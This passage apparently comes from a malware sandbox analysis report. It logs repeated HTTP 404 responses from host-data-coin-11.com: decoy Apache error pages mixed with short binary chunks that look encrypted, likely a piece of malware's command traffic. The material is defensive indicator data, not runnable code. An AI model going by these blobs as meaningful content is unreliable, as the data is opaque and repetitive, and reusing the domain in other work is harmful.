6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 14 Jan 2022 12:59:43 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 14 Jan 2022 12:59:44 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 14 Jan 2022 12:59:44 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 34 36 0d 0a 00 00 d3 92 a0 49 bd 3a 38 32 11 af 01 b5 db ad d6 09 4f c5 86 52 06 26 1a ff b5 98 ff a9 1e ad 12 93 3a f9 55 50 99 4a f7 e0 25 e5 39 1a 48 e5 af 8d 70 bc 57 dd 40 d6 f6 2e 84 2a e8 c3 90 53 2e ef a8 1d 63 a9 0d 0a 30 0d 0a 0d 0a Data Ascii: 46I:82OR&:UPJ%9HpW@.*S.c0
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 14 Jan 2022 12:59:46 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 14 Jan 2022 12:59:46 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 66 0d 0a 00 00 d3 92 a0 49 bd 3a 38 32 11 af 01 b5 db ad 9f 1c 4f 8e 80 49 08 25 01 e5 e9 8d b0 a2 37 0d 0a 30 0d 0a 0d 0a Data Ascii: 1fI:82OI%70
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 14 Jan 2022 12:59:47 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 33 30 0d 0a 00 00 d3 92 a0 49 bd 3a 38 32 11 af 01 b5 db ad 9f 1c 4f 8e 93 54 06 65 01 f6 a3 9e fc b9 19 eb 1b db 76 f8 67 5d a4 09 d7 cd 66 c7 64 50 06 b9 0d 0a 30 0d 0a 0d 0a Data Ascii: 30I:82OTevg]fdP0
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 14 Jan 2022 12:59:48 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 14 Jan 2022 12:59:48 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 34 36 0d 0a 00 00 d3 92 a0 49 bd 3a 38 32 11 af 01 b5 db ad d6 09 4f c5 86 52 06 26 1a ff b5 98 ff a9 1e ad 12 93 3a f9 55 50 99 4a f7 e0 25 e5 39 1a 46 e8 ae 88 70 bc 57 dd 43 df f9 21 87 26 ec c3 91 50 23 e4 a8 1d 63 a9 0d 0a 30 0d 0a 0d 0a Data Ascii: 46I:82OR&:UPJ%9FpWC!&P#c0
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 14 Jan 2022 12:59:50 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 14 Jan 2022 12:59:50 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 32 38 0d 0a 00 00 d3 92 a0 49 bd 3a 38 32 11 af 01 b5 db ad d6 09 4f 99 d6 08 56 3d 41 be f5 dc fc fb 49 f5 53 8f 32 e6 18 5a 8c 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 28I:82OV=AIS2Z0
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 14 Jan 2022 12:59:52 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 14 Jan 2022 12:59:53 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 33 30 0d 0a 00 00 d3 92 a0 49 bd 3a 38 32 11 af 01 b5 db ad 9f 1c 4f 8e 93 54 06 65 01 f6 a3 9e fc b9 19 eb 1b db 76 f8 43 4e c7 3d c2 ec 66 b5 64 50 06 b9 0d 0a 30 0d 0a 0d 0a Data Ascii: 30I:82OTevCN=fdP0
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 14 Jan 2022 12:59:57 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 14 Jan 2022 12:59:57 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 34 36 0d 0a 00 00 d3 92 a0 49 bd 3a 38 32 11 af 01 b5 db ad d6 09 4f c5 86 52 06 26 1a ff b5 98 ff a9 1e ad 12 93 3a f9 55 50 99 4a f7 e0 25 e5 39 1a 48 e5 af 8d 70 bc 57 dd 40 d6 f6 2e 84 2a e8 c3 90 53 2e ef a8 1d 63 a9 0d 0a 30 0d 0a 0d 0a Data Ascii: 46I:82OR&:UPJ%9HpW@.*S.c0
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 14 Jan 2022 13:00:04 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 14 Jan 2022 13:00:05 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 34 36 0d 0a 00 00 d3 92 a0 49 bd 3a 38 32 11 af 01 b5 db ad d6 09 4f c5 86 52 06 26 1a ff b5 98 ff a9 1e ad 12 93 3a f9 55 50 99 4a f7 e0 25 e5 39 1a 49 eb ab 85 70 bc 57 dd 40 d7 fe 26 83 22 eb c3 93 58 28 e3 a8 1d 63 a9 0d 0a 30 0d 0a 0d 0a Data Ascii: 46I:82OR&:UPJ%9IpW@&"X(c0
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 14 Jan 2022 13:00:10 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
